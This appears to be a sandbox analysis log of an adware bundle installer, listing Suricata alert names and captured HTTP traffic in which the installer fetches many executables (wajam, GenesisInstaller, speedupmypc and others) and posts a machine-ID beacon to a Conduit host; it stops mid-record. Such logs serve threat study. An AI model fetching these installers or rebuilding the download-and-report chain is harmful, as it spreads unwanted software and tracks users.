hxxp://sp-installer.conduit-data.com/ 54.243.77.179
s3.amazonaws.com 54.231.244.0


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY Executable served from Amazon S3
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /download/wajam_download.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: VVV.wajam-download.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:14 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 21 May 2014 20:10:53 GMT
ETag: "66d4e-f0c0-4f9ee97e8ed40"
Accept-Ranges: bytes
Content-Length: 61632
Connection: close
Content-Type: application/x-msdos-program
Set-Cookie: APPSESSID=w1|VEXFs|VEXFs; path=/
Cache-control: private

<<< skipped >>>

GET //Displays/Softwares/1d58e78d_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:26 GMT
Content-Type: text/html
Last-Modified: Fri, 10 Jan 2014 15:52:57 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET //Styles/Softwares/7a6c4a7c_genesis.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: application/zip
Content-Length: 712
Last-Modified: Tue, 25 Mar 2014 18:45:40 GMT
Connection: close
ETag: "5331ced4-2c8"
Accept-Ranges: bytes


GET //Docking/Docking.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:21 GMT
Content-Type: application/zip
Content-Length: 37048
Last-Modified: Tue, 26 Nov 2013 13:00:11 GMT
Connection: close
ETag: "52949b5b-90b8"
Accept-Ranges: bytes

<<< skipped >>>

GET /si/Bundle.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: cdn4.vitaldownload.com
Connection: Close


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 141824
Connection: close
Date: Sun, 19 Oct 2014 06:44:39 GMT
Last-Modified: Sun, 19 Oct 2014 06:39:02 GMT
ETag: "28d626b8c4722628cd8a6019b2f17acd"
Accept-Ranges: bytes
Server: AmazonS3
Age: 54377
X-Cache: Hit from cloudfront
Via: 1.1 d26e060bf36b2533ddf09498db6904d5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HlK6E0b-am78rKLDt3sNcWdEnMasYWHYzyKv8YzDAUbIVtGA39aCug==
<<< skipped >>>

GET /test.html HTTP/1.1
Host: api.v2.sslsecure2.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:56 GMT
Server: Apache
Set-Cookie: vsid=905vr1614043164902767; expires=Sun, 20-Oct-2019 02:31:56 GMT; path=/; domain=api.v2.sslsecure2.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


GET //Styles/Softwares/67423fe2_wajam.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:22 GMT
Content-Type: application/zip
Content-Length: 111525
Last-Modified: Thu, 17 Jul 2014 09:09:05 GMT
Connection: close
ETag: "53c792b1-1b3a5"
Accept-Ranges: bytes

<<< skipped >>>

GET /si/Bundle.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: cdn4.vitaldownload.com
Connection: Close


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 141824
Connection: close
Date: Sun, 19 Oct 2014 06:44:39 GMT
Last-Modified: Sun, 19 Oct 2014 06:39:02 GMT
ETag: "28d626b8c4722628cd8a6019b2f17acd"
Accept-Ranges: bytes
Server: AmazonS3
Age: 54377
X-Cache: Hit from cloudfront
Via: 1.1 7e54fc06cd70e4752fe050bbe5c130be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: O4aAH7j1ZV7a6KHkM4yeCsgXhRRXuw2BbQFvEGlw38nyz6Fy4utcaA==

<<< skipped >>>

GET /ba/full/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newgenstatsnet.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:13 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1413807219"
Last-Modified: Mon, 20 Oct 2014 12:13:39 GMT
Cache-Control: max-age=2514
Content-Length: 11426128
Content-Type: application/x-msdownload
X-HW: 1413858733.dop007.ny2.t,1413858733.cds053.ny2.c
Content-Disposition: attachment; filename="setup.exe"

<<< skipped >>>

GET /spidentifier/1.0.2.0/spidentifierimpl.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: sp-storage.conduit-services.com
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 301 Moved Permanently
Location: hXXp://sp-storage.spccinta.com//spidentifier/1.0.2.0/spidentifierimpl.exe
Server: BigIP
Content-Length: 0
Cache-Control: private, max-age=900
Expires: Tue, 21 Oct 2014 02:47:08 GMT
Date: Tue, 21 Oct 2014 02:32:08 GMT
Connection: close


GET //Styles/Softwares/3a04fadf_speedupmypc.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:26 GMT
Content-Type: application/zip
Content-Length: 45456
Last-Modified: Tue, 15 Oct 2013 12:35:00 GMT
Connection: close
ETag: "525d3674-b190"
Accept-Ranges: bytes

<<< skipped >>>

GET //Displays/Softwares/7039a47f_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:22 GMT
Content-Type: text/html
Last-Modified: Tue, 24 Jun 2014 10:07:27 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET /installer.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: get.ctx-genesis.com
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:15 GMT
Content-Type: application/octet-stream
Content-Length: 1554432
Last-Modified: Mon, 13 Oct 2014 10:14:10 GMT
Connection: close
Content-Disposition: attachment; filename="GenesisInstaller.exe"
Accept-Ranges: bytes

<<< skipped >>>

GET /test.html HTTP/1.1
Host: api.v2.sslsecure4.com
Connection: Close


HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 21 Oct 2014 02:31:57 GMT
Server: nginx
Content-Length: 8
Connection: Close
correct...


GET /installer.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: get.ctx-genesis.com
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:14 GMT
Content-Type: application/octet-stream
Content-Length: 1554432
Last-Modified: Mon, 13 Oct 2014 10:14:10 GMT
Connection: close
Content-Disposition: attachment; filename="GenesisInstaller.exe"
Accept-Ranges: bytes

<<< skipped >>>

GET //Styles/Softwares/844a2c3b_browserapp.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: application/zip
Content-Length: 734
Last-Modified: Tue, 01 Jul 2014 09:26:57 GMT
Connection: close
ETag: "53b27ee1-2de"
Accept-Ranges: bytes


GET /test.html HTTP/1.1
Host: track.v2.sslsecure1.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:53 GMT
Server: Apache
Set-Cookie: vsid=913vr1614043135600456; expires=Sun, 20-Oct-2019 02:31:53 GMT; path=/; domain=track.v2.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


GET //Displays/Templates/8b4083bc_Win-Y-Yahoo.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:21 GMT
Content-Type: application/zip
Content-Length: 7483
Last-Modified: Mon, 03 Mar 2014 12:57:44 GMT
Connection: close
ETag: "53147c48-1d3b"
Accept-Ranges: bytes

<<< skipped >>>

GET /test.html HTTP/1.1
Host: api.v2.sslsecure1.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:56 GMT
Server: Apache
Set-Cookie: vsid=920vr1614043162210446; expires=Sun, 20-Oct-2019 02:31:56 GMT; path=/; domain=api.v2.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


GET /download/wajam_download.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: VVV.wajam-download.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:14 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 21 May 2014 20:10:51 GMT
ETag: "7015d-f0c0-4f9ee97ca68c0"
Accept-Ranges: bytes
Content-Length: 61632
Connection: close
Content-Type: application/x-msdos-program
Set-Cookie: APPSESSID=w2|VEXFs|VEXFs; path=/
Cache-control: private

<<< skipped >>>

GET //Displays/Softwares/1f76ab55_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: text/html
Last-Modified: Thu, 17 Jul 2014 09:13:47 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET //Styles/Softwares/7a6c4a7c_genesis.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: application/zip
Content-Length: 712
Last-Modified: Tue, 25 Mar 2014 18:45:40 GMT
Connection: close
ETag: "5331ced4-2c8"
Accept-Ranges: bytes


GET /debug/Version/4_0_6_30/Nsis/GetParameters HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:37 GMT
Server: Apache
Set-Cookie: vsid=910vr1614042971716942; expires=Sun, 20-Oct-2019 02:31:37 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<html>..<head><meta name="t
ids" content="a='7377' b='9745' c='sslsecure1.com' d='entity_mapped'"
/><title>sslsecure1.com</title>..<meta http-equiv="C
ontent-Type" content="text/html; charset=UTF-8">..<meta http-equ
iv="X-UA-Compatible" content="IE=EmulateIE7">..<style type="text
/css">..*{margin:0;padding:0; font-family:Arial, Helvetica, sans-se
rif}..input{outline:none}...wrapper{width:1024px;height:768px; margin:
0 auto; background:url(hXXp://i1.cdn-image.com/__media__/pics/7375/lef
t.gif) no-repeat 0 130px}...inner-wrapper{width:1024px;background:url(
hXXp://i3.cdn-image.com/__media__/pics/7375/right.gif) no-repeat right
130px; height:768px}...header{padding:40px 0 20px 0}..h1{padding-top:
10px}...header h1 a{color:#78603b; font-size:35px; font-weight:bold; t
ext-decoration:none}...header span{color:#6a6a6a; font-size:13px}...se
archbox .box{width:278px; height:36px; background:url(hXXp://i2.cdn-im
age.com/__media__/pics/7375/searchbg.gif) no-repeat; border:none; line
-height:36px; padding:0 5px}...searchbox p{font-style:italic;color:#6a
6a6a; font-size:13px; padding-bottom:5px}...searchbox{float:right; pos
ition:relative}...logobox{float:left}...container{width:1024px}..ul{ma
rgin:0 auto; width:33%; padding-top:38px; text-align:center}..li{list-
style:none; padding-bottom:12px}..li a{font-size:24px; color:#0066ff;
font-weight:bold; line-height:40px; text-transform:capitalize}...c

<<< skipped >>>

GET /ba/shop/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newgenstatsnet.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:15 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1413807295"
Last-Modified: Mon, 20 Oct 2014 12:14:55 GMT
Cache-Control: max-age=2593
Content-Length: 11416440
Content-Type: application/x-msdownload
X-HW: 1413858735.dop006.ny2.t,1413858735.cds051.ny2.c
Content-Disposition: attachment; filename="setup.exe"

<<< skipped >>>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.conduit-data.com
Content-Length: 225
Connection: Keep-Alive
Cache-Control: no-cache

{"event_type":"SPidentifier", "environment":"",  "machine_ID":"IGLPAZZPZGFIMOT1B RJNV1K7TMDFU BMNXXJDZJK NF/RB AB/BYPPEZXOET4OC8Q82QKOOJII3O1IEAOTPCW", "result": "success", "failure_reason": "clean_machine", "SP_version": ""}
HTTP/1.1 202 Accepted
Date: Tue, 21 Oct 2014 02:32:12 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive


GET /index.php/api/85/Java/195/286/English.xml HTTP/1.1
Accept-Encoding: gzip, deflate,gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: api.v2.sslsecure4.com
Connection: Close


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding: gzip
Content-Type: text/xml; charset=utf-8
Date: Tue, 21 Oct 2014 02:32:06 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: nginx
Set-Cookie: symfony=64vhocqbj62rhnuh3dne4v9qg6; path=/
transfer-encoding: chunked
Connection: Close

<<< skipped >>>

GET //spidentifier/1.0.2.0/spidentifierimpl.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate,gzip, deflate
Host: sp-storage.spccinta.com
Connection: Close


HTTP/1.1 200 OK
Last-Modified: Tue, 21 Oct 2014 05:32:08 GMT
Accept-Ranges: bytes
ETag: "a598e211a86915fe8941be6e4d135f8b"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 2592168
Date: Tue, 21 Oct 2014 02:32:08 GMT
Connection: close

<<< skipped >>>

GET /ba/shop/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newgenstatsnet.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:15 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1413807295"
Last-Modified: Mon, 20 Oct 2014 12:14:55 GMT
Cache-Control: max-age=2593
Content-Length: 11416440
Content-Type: application/x-msdownload
X-HW: 1413858735.dop006.ny2.t,1413858735.cds051.ny2.c
Content-Disposition: attachment; filename="setup.exe"

<<< skipped >>>

GET //Displays/Softwares/6fe4b061_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: text/html
Last-Modified: Tue, 25 Mar 2014 18:46:17 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET //Styles/Softwares/82fb03ea_binghp4.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:21 GMT
Content-Type: application/zip
Content-Length: 740
Last-Modified: Tue, 24 Jun 2014 10:05:59 GMT
Connection: close
ETag: "53a94d87-2e4"
Accept-Ranges: bytes


GET //Styles/Softwares/9c04a3ed_thebestdeals.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: application/zip
Content-Length: 750
Last-Modified: Thu, 09 Jan 2014 10:45:27 GMT
Connection: close
ETag: "52ce7dc7-2ee"
Accept-Ranges: bytes


GET /test.html HTTP/1.1
Host: track.v2.sslsecure3.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:54 GMT
Server: Apache
Set-Cookie: vsid=925vr1614043140610643; expires=Sun, 20-Oct-2019 02:31:54 GMT; path=/; domain=track.v2.sslsecure3.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


GET /7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: aff-software.s3-website-us-east-1.amazonaws.com
Connection: Close


HTTP/1.1 200 OK
x-amz-id-2: JByyQUSVkCbGCtzdBEnuaFPXWbPoUMgQf3riPBCD4yxs1v6AwnDMiNazHeOz8wKA
x-amz-request-id: A5AADF8B1BCB6C69
Date: Tue, 21 Oct 2014 02:32:16 GMT
Last-Modified: Tue, 08 Jul 2014 14:34:06 GMT
ETag: "af37247590f4e4b8a8a214a091ea6067"
Content-Type: application/octet-stream
Content-Length: 73816
Server: AmazonS3

<<< skipped >>>

GET /cm/softlate/speedupmypc/option9/setup/speedupmypc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: download.uniblue.com
Connection: Close


HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 21 Oct 2014 02:32:19 GMT
Location: hXXp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe
Server: openresty/1.5.8.1
Content-Length: 78
Connection: Close
hXXp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedup
mypc.exe..


GET /test.html HTTP/1.1
Host: staticrr.paleokits.net
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:31:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
8..correct...0..


GET /apps/dist/9020-2085_TheBestDeals.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: xml.collectioncss.net
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:15 GMT
Expires: Mon, 27 Oct 2014 20:43:57 GMT
Last-Modified: Sun, 12 Oct 2014 12:14:36 GMT
Cache-Control: max-age=604800
Content-Type: application/octet-stream
ETag: "623421-50538b9bc8300"
Accept-Ranges: bytes
Server: Apache
Content-Length: 6435873
Connection: close

<<< skipped >>>

GET //Styles/Softwares/db393704_vuupc.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:26 GMT
Content-Type: application/zip
Content-Length: 741
Last-Modified: Fri, 10 Jan 2014 15:21:49 GMT
Connection: close
ETag: "52d0100d-2e5"
Accept-Ranges: bytes


GET /cm/softlate/speedupmypc/option9/setup/speedupmypc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: download.uniblue.com
Connection: Close


HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 21 Oct 2014 02:32:18 GMT
Location: hXXp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe
Server: openresty/1.5.8.1
Content-Length: 78
Connection: Close
hXXp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedup
mypc.exe..


GET //Dictionaries/English.xml HTTP/1.1
Host: staticrr.paleokits.net
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:07 GMT
Content-Type: text/xml
Content-Length: 626
Last-Modified: Fri, 12 Apr 2013 09:51:55 GMT
Connection: close
ETag: "5167d93b-272"
Accept-Ranges: bytes
<dictionary>.  <installed> Installed </installed> . 
<installing>Installing</installing> . <installingetc>
Installing...</installingetc> . <downloadError>An Erro
r has occurred</downloadError> . <takeFewMinutes>It may t
ake a few seconds</takeFewMinutes> . <confirmExit>Are you
sure you want to exit?</confirmExit> . <installClose>Do
you want to install the remaining offers?</installClose> . <
welcome>Welcome</welcome> . <license>Welcome</licen
se> . <options>Additional Options</options> . <ins
talando>Installing</instalando> . <finish>Finished<
/finish>. <downloadingetc>Downloading...</downloadingetc>
 .</dictionary>..


GET /apps/dist/9020-2085_TheBestDeals.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: xml.collectioncss.net
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:15 GMT
Expires: Mon, 27 Oct 2014 20:43:57 GMT
Last-Modified: Sun, 12 Oct 2014 12:14:36 GMT
Cache-Control: max-age=604800
Content-Type: application/octet-stream
ETag: "623421-50538b9bc8300"
Accept-Ranges: bytes
Server: Apache
Content-Length: 6435873
Connection: close

<<< skipped >>>

GET /7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: aff-software.s3-website-us-east-1.amazonaws.com
Connection: Close


HTTP/1.1 200 OK
x-amz-id-2: c9gp3VWrDwffFNTokgZvTL9SUYkEnQXf9h4UIw au6VCQB1tltCiDjZzX3 66NJ7
x-amz-request-id: 6213E9D41DE95D7C
Date: Tue, 21 Oct 2014 02:32:16 GMT
Last-Modified: Tue, 08 Jul 2014 14:34:06 GMT
ETag: "af37247590f4e4b8a8a214a091ea6067"
Content-Type: application/octet-stream
Content-Length: 73816
Server: AmazonS3

<<< skipped >>>

GET //Displays/Softwares/16220985_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:25 GMT
Content-Type: text/html
Last-Modified: Thu, 03 Oct 2013 10:28:07 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET //Styles/Softwares/e7bf26c3_mypcbackup.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: application/zip
Content-Length: 7774
Last-Modified: Tue, 15 Oct 2013 10:54:23 GMT
Connection: close
ETag: "525d1edf-1e5e"
Accept-Ranges: bytes

<<< skipped >>>

GET //Styles/Templates/d7d18a25_Win-Y.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate,gzip, deflate
Host: staticrr.paleokits.net
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:20 GMT
Content-Type: application/zip
Content-Length: 218389
Last-Modified: Wed, 26 Feb 2014 11:59:42 GMT
Connection: close
ETag: "530dd72e-35515"
Accept-Ranges: bytes

<<< skipped >>>

GET /test.html HTTP/1.1
Host: track.v2.sslsecure2.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:53 GMT
Server: Apache
Set-Cookie: vsid=902vr1614043138202826; expires=Sun, 20-Oct-2019 02:31:53 GMT; path=/; domain=track.v2.sslsecure2.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


GET //Displays/Softwares/4d947901_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:27 GMT
Content-Type: text/html
Last-Modified: Mon, 07 Oct 2013 12:18:54 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip

<<< skipped >>>

GET /installer.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: get.ctx-genesis.com
Connection: Close


HTTP/1.1 200 OK
Server: nginx
